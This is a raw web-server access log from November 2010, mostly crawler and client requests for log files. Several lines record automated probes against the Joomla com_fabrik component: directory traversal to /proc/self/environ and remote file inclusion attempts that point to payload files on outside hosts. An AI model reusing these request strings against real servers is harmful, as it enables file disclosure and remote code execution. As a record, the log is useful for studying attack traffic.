85.10.141.105 - - [19/Nov/2010:15:44:09 -0800] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 360 "-" "libwww-perl/5.805"
85.10.141.105 - - [19/Nov/2010:15:44:10 -0800] "GET / HTTP/1.1" 200 6179 "-" "libwww-perl/5.805"
69.10.147.178 - - [19/Nov/2010:15:56:49 -0800] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 360 "-" "libwww-perl/5.805"
69.10.147.178 - - [19/Nov/2010:15:56:49 -0800] "GET / HTTP/1.1" 200 6179 "-" "libwww-perl/5.805"
66.249.68.176 - - [19/Nov/2010:16:24:46 -0800] "GET /robots.txt HTTP/1.1" 302 361 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.176 - - [19/Nov/2010:16:24:46 -0800] "GET /gorgeworld-error.log HTTP/1.1" 200 111 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.94 - - [19/Nov/2010:16:25:54 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.187 - - [19/Nov/2010:16:26:16 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.195.114.28 - - [19/Nov/2010:17:26:08 -0800] "GET /robots.txt HTTP/1.0" 302 360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.28 - - [19/Nov/2010:17:26:09 -0800] "GET / HTTP/1.0" 200 6179 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.28 - - [19/Nov/2010:17:26:09 -0800] "GET / HTTP/1.0" 200 6182 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
93.158.148.31 - - [19/Nov/2010:17:36:26 -0800] "GET /sharkbomb-access.log HTTP/1.1" 200 3720 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.67.12 - - [19/Nov/2010:17:55:47 -0800] "GET /robots.txt HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.12 - - [19/Nov/2010:17:55:47 -0800] "GET /gorgeworld-error.log HTTP/1.1" 200 111 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
220.181.108.146 - - [19/Nov/2010:19:23:17 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.162 - - [19/Nov/2010:19:23:18 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.195.114.28 - - [19/Nov/2010:19:29:46 -0800] "GET /gorgeworld-access.log HTTP/1.0" 200 463 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.47 - - [19/Nov/2010:19:34:07 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.199.47 - - [19/Nov/2010:19:34:07 -0800] "GET / HTTP/1.1" 200 6179 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.199.47 - - [19/Nov/2010:19:40:27 -0800] "GET / HTTP/1.1" 200 6182 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
93.158.148.31 - - [19/Nov/2010:19:43:23 -0800] "GET /orbsucks-access.log HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.67.146 - - [19/Nov/2010:20:05:38 -0800] "GET /robots.txt HTTP/1.1" 302 359 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.146 - - [19/Nov/2010:20:05:38 -0800] "GET /evilfuckers-access.log HTTP/1.1" 200 824 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.77 - - [19/Nov/2010:21:43:44 -0800] "GET /paxnihilo-access.log HTTP/1.1" 200 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
93.158.148.31 - - [19/Nov/2010:21:50:20 -0800] "GET /ferality-access.log HTTP/1.1" 200 2351 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
93.158.148.31 - - [19/Nov/2010:23:57:16 -0800] "GET /jasoncmartin-access.log HTTP/1.1" 200 1149 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
83.103.63.19 - - [20/Nov/2010:00:18:50 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.yeshouse.net/column/lecture/id.txt??? HTTP/1.1" 302 360 "-" "libwww-perl/5.834"
83.103.63.19 - - [20/Nov/2010:00:18:51 -0800] "GET / HTTP/1.1" 200 6179 "-" "libwww-perl/5.834"
83.103.63.19 - - [20/Nov/2010:00:18:53 -0800] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://kushmehr.com/themes/anak.txt???????? HTTP/1.1" 302 360 "-" "libwww-perl/5.834"
83.103.63.19 - - [20/Nov/2010:00:18:53 -0800] "GET / HTTP/1.1" 200 6179 "-" "libwww-perl/5.834"
83.103.63.19 - - [20/Nov/2010:00:20:56 -0800] "GET //index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.yeshouse.net/column/lecture/id.txt??? HTTP/1.1" 302 360 "-" "libwww-perl/5.834"
83.103.63.19 - - [20/Nov/2010:00:20:57 -0800] "GET / HTTP/1.1" 200 6179 "-" "libwww-perl/5.834"
83.103.63.19 - - [20/Nov/2010:00:20:57 -0800] "GET //index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://kushmehr.com/themes/anak.txt???????? HTTP/1.1" 302 360 "-" "libwww-perl/5.834"
83.103.63.19 - - [20/Nov/2010:00:20:58 -0800] "GET / HTTP/1.1" 200 6179 "-" "libwww-perl/5.834"
66.249.67.141 - - [20/Nov/2010:00:38:52 -0800] "GET /robots.txt HTTP/1.1" 302 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.141 - - [20/Nov/2010:00:38:52 -0800] "GET / HTTP/1.1" 200 6179 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.141 - - [20/Nov/2010:00:38:52 -0800] "GET /browserbomb-error.log HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.117 - - [20/Nov/2010:01:16:59 -0800] "GET / HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.180 - - [20/Nov/2010:01:17:03 -0800] "GET / HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
93.158.148.31 - - [20/Nov/2010:02:04:12 -0800] "GET /log-error.log HTTP/1.1" 200 1396 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
174.122.5.68 - - [20/Nov/2010:02:29:32 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
174.122.5.68 - - [20/Nov/2010:02:30:20 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
174.122.5.68 - - [20/Nov/2010:02:34:45 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
174.122.5.68 - - [20/Nov/2010:02:35:14 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
174.122.5.68 - - [20/Nov/2010:02:35:17 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
174.122.5.68 - - [20/Nov/2010:02:35:25 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
174.122.5.68 - - [20/Nov/2010:02:35:59 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
174.122.5.68 - - [20/Nov/2010:02:36:05 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
174.122.5.68 - - [20/Nov/2010:02:36:40 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
174.122.5.68 - - [20/Nov/2010:02:57:22 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
174.122.5.68 - - [20/Nov/2010:02:57:39 -0800] "GET //?option=com_fabrik&task=view&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6182 "-" "libwww-perl/5.837"
123.125.71.95 - - [20/Nov/2010:03:24:57 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.185 - - [20/Nov/2010:03:25:17 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
93.158.148.31 - - [20/Nov/2010:04:11:09 -0800] "GET /vaginacide-error.log HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
123.125.71.99 - - [20/Nov/2010:04:23:44 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.174 - - [20/Nov/2010:04:24:02 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.70 - - [20/Nov/2010:04:35:31 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.85 - - [20/Nov/2010:04:39:22 -0800] "GET /nov2010/ HTTP/1.1" 200 6153 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.81 - - [20/Nov/2010:04:43:13 -0800] "GET /2girls4lokos-access.log HTTP/1.1" 200 5389 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.89 - - [20/Nov/2010:04:47:13 -0800] "GET /evilfuckers-access.log HTTP/1.1" 200 2078 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
193.105.210.32 - - [20/Nov/2010:04:49:41 -0800] "GET /jasoncmartin-access.log HTTP/1.0" 200 1149 "http://unusualdischarge.com/jasoncmartin-access.log" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
193.105.210.32 - - [20/Nov/2010:04:49:42 -0800] "GET / HTTP/1.0" 200 6182 "http://unusualdischarge.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
123.125.71.86 - - [20/Nov/2010:04:51:02 -0800] "GET /clownjuice-access.log HTTP/1.1" 200 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.88 - - [20/Nov/2010:04:54:53 -0800] "GET /2girls4lokos-error.log HTTP/1.1" 200 1320 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.68.176 - - [20/Nov/2010:05:14:02 -0800] "GET /robots.txt HTTP/1.1" 302 361 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.176 - - [20/Nov/2010:05:14:02 -0800] "GET / HTTP/1.1" 200 6183 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
119.63.198.20 - - [20/Nov/2010:06:09:15 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
119.63.198.43 - - [20/Nov/2010:06:09:15 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
93.158.148.31 - - [20/Nov/2010:07:05:36 -0800] "GET /?C=D;O=D HTTP/1.1" 200 6182 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
123.125.71.111 - - [20/Nov/2010:07:34:57 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.174 - - [20/Nov/2010:07:35:27 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.68.176 - - [20/Nov/2010:08:03:09 -0800] "GET /2girls4lokos-access.log HTTP/1.1" 200 5389 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.176 - - [20/Nov/2010:08:03:11 -0800] "GET /2girls4lokos-error.log HTTP/1.1" 200 1320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.176 - - [20/Nov/2010:08:03:12 -0800] "GET /nov2010/ HTTP/1.1" 200 6157 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
119.63.198.62 - - [20/Nov/2010:08:04:31 -0800] "GET /robots.txt HTTP/1.1" 302 357 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
119.63.198.42 - - [20/Nov/2010:08:04:31 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.140 - - [20/Nov/2010:09:37:49 -0800] "GET /robots.txt HTTP/1.1" 302 357 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.149 - - [20/Nov/2010:09:37:50 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.97 - - [20/Nov/2010:10:16:42 -0800] "GET / HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.170 - - [20/Nov/2010:10:16:46 -0800] "GET / HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.71.225 - - [20/Nov/2010:10:21:32 -0800] "GET /robots.txt HTTP/1.1" 302 361 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:21:32 -0800] "GET /nov2010/terhanian-error.log HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:21:33 -0800] "GET /nov2010/evilfuckers-access.log HTTP/1.1" 200 1030253 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:21:45 -0800] "GET /nov2010/log-error.log HTTP/1.1" 200 2419677 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.201.66.28 - - [20/Nov/2010:10:23:15 -0800] "GET /terhanian-error.log HTTP/1.0" 200 - "http://redhatcasino.com/" "Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)"
66.249.71.225 - - [20/Nov/2010:10:22:54 -0800] "GET /nov2010/log-access.log HTTP/1.1" 200 6206155 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:24:49 -0800] "GET /nov2010/orbsucks-error.log HTTP/1.1" 200 163396 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:26:45 -0800] "GET /nov2010/ferality-error.log HTTP/1.1" 200 293986 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:28:40 -0800] "GET /nov2010/ferality-access.log HTTP/1.1" 200 3132544 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:30:36 -0800] "GET /nov2010/sharkbomb-error.log HTTP/1.1" 200 104679 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:32:32 -0800] "GET /nov2010/paxnihilo-error.log HTTP/1.1" 200 21130 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:34:27 -0800] "GET /nov2010/orbsucks-access.log HTTP/1.1" 200 1025768 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:36:23 -0800] "GET /nov2010/vaginacide-error.log HTTP/1.1" 200 36671 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:38:18 -0800] "GET /nov2010/clownjuice-error.log HTTP/1.1" 200 287600 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:40:14 -0800] "GET /nov2010/sharkbomb-access.log HTTP/1.1" 200 1521665 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:42:10 -0800] "GET /nov2010/terhanian-access.log HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:44:05 -0800] "GET /nov2010/paxnihilo-access.log HTTP/1.1" 200 89293 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:46:01 -0800] "GET /nov2010/gorgeworld-error.log HTTP/1.1" 200 148355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:47:56 -0800] "GET /nov2010/evilfuckers-error.log HTTP/1.1" 200 275117 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:49:52 -0800] "GET /nov2010/clownjuice-access.log HTTP/1.1" 200 566552 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:51:48 -0800] "GET /nov2010/browserbomb-error.log HTTP/1.1" 200 125313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:53:43 -0800] "GET /nov2010/gorgeworld-access.log HTTP/1.1" 200 468902 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:55:39 -0800] "GET /nov2010/vaginacide-access.log HTTP/1.1" 200 115342 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:57:34 -0800] "GET /nov2010/browserbomb-access.log HTTP/1.1" 200 202321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:10:59:30 -0800] "GET /nov2010/jasoncmartin-error.log HTTP/1.1" 200 956989 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:11:01:26 -0800] "GET /nov2010/dustinharley-error.log HTTP/1.1" 200 545791 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:11:03:22 -0800] "GET /nov2010/jasoncmartin-access.log HTTP/1.1" 200 2690013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [20/Nov/2010:11:05:35 -0800] "GET /nov2010/dustinharley-access.log HTTP/1.1" 200 4230194 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
91.201.66.28 - - [20/Nov/2010:11:35:51 -0800] "GET /terhanian-error.log HTTP/1.0" 200 - "http://redhatcasino.com/" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00"
123.125.71.117 - - [20/Nov/2010:12:24:40 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.166 - - [20/Nov/2010:12:25:00 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.46.12.165 - - [20/Nov/2010:12:52:36 -0800] "GET / HTTP/1.1" 200 6182 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.30729)"
91.201.66.28 - - [20/Nov/2010:13:37:41 -0800] "GET /terhanian-error.log HTTP/1.0" 200 - "http://redhatcasino.com/" "Opera/8.00 (Windows NT 5.1; U; en)"
92.112.166.79 - - [20/Nov/2010:14:24:50 -0800] "GET /log-access.log HTTP/1.0" 200 18533 "http://unusualdischarge.com/log-access.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
92.112.166.79 - - [20/Nov/2010:14:24:51 -0800] "GET / HTTP/1.0" 200 6182 "http://unusualdischarge.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
66.249.71.227 - - [20/Nov/2010:14:26:20 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.227 - - [20/Nov/2010:14:26:20 -0800] "GET /evilfuckers-access.log HTTP/1.1" 200 3242 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.231.248.252 - - [20/Nov/2010:14:36:20 -0800] "GET /browserbomb-access.log HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.99 - - [20/Nov/2010:15:24:36 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.176 - - [20/Nov/2010:15:24:55 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.195.114.28 - - [20/Nov/2010:15:34:32 -0800] "GET /robots.txt HTTP/1.0" 302 360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.28 - - [20/Nov/2010:15:34:32 -0800] "GET / HTTP/1.0" 200 6179 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.28 - - [20/Nov/2010:15:34:33 -0800] "GET /sharkbomb-access.log HTTP/1.0" 200 5481 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.28 - - [20/Nov/2010:15:42:18 -0800] "GET /orbsucks-access.log HTTP/1.0" 200 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
92.82.225.31 - - [20/Nov/2010:15:51:09 -0800] "GET / HTTP/1.1" 200 6182 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:10 -0800] "GET /2girls4lokos-access.log HTTP/1.1" 200 5389 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:10 -0800] "GET /2girls4lokos-error.log HTTP/1.1" 200 1320 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:11 -0800] "GET /browserbomb-access.log HTTP/1.1" 200 - "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:11 -0800] "GET /browserbomb-error.log HTTP/1.1" 200 - "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:12 -0800] "GET /clownjuice-access.log HTTP/1.1" 200 1441 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:12 -0800] "GET /clownjuice-error.log HTTP/1.1" 200 220 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:12 -0800] "GET /dustinharley-access.log HTTP/1.1" 200 3492 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:13 -0800] "GET /dustinharley-error.log HTTP/1.1" 200 223 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:13 -0800] "GET /evilfuckers-access.log HTTP/1.1" 200 3409 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:13 -0800] "GET /evilfuckers-error.log HTTP/1.1" 200 110 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:14 -0800] "GET /ferality-access.log HTTP/1.1" 200 6567 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:14 -0800] "GET /ferality-error.log HTTP/1.1" 200 220 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:14 -0800] "GET /gorgeworld-access.log HTTP/1.1" 200 1243 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:14 -0800] "GET /gorgeworld-error.log HTTP/1.1" 200 331 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:15 -0800] "GET /jasoncmartin-access.log HTTP/1.1" 200 3356 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:15 -0800] "GET /jasoncmartin-error.log HTTP/1.1" 200 1001 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:15 -0800] "GET /log-access.log HTTP/1.1" 200 22259 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:16 -0800] "GET /log-error.log HTTP/1.1" 200 2926 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:16 -0800] "GET /orbsucks-access.log HTTP/1.1" 200 - "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:16 -0800] "GET /orbsucks-error.log HTTP/1.1" 200 - "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:17 -0800] "GET /paxnihilo-access.log HTTP/1.1" 200 627 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:17 -0800] "GET /paxnihilo-error.log HTTP/1.1" 200 109 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:17 -0800] "GET /sharkbomb-access.log HTTP/1.1" 200 5481 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:18 -0800] "GET /sharkbomb-error.log HTTP/1.1" 200 319 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:18 -0800] "GET /terhanian-access.log HTTP/1.1" 200 - "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:18 -0800] "GET /terhanian-error.log HTTP/1.1" 200 - "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:18 -0800] "GET /?C=D;O=A HTTP/1.1" 200 6182 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:19 -0800] "GET /nov2010 HTTP/1.1" 301 396 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:22 -0800] "GET /nov2010/ HTTP/1.1" 200 6156 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:23 -0800] "GET //2girls4lokos-access.log HTTP/1.1" 200 5389 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:23 -0800] "GET //2girls4lokos-error.log HTTP/1.1" 200 1320 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:23 -0800] "GET //browserbomb-access.log HTTP/1.1" 200 - "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:24 -0800] "GET //browserbomb-error.log HTTP/1.1" 200 - "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:24 -0800] "GET //clownjuice-access.log HTTP/1.1" 200 1441 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:24 -0800] "GET //clownjuice-error.log HTTP/1.1" 200 220 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:25 -0800] "GET //dustinharley-access.log HTTP/1.1" 200 3492 "-" "Java/1.6.0_22"
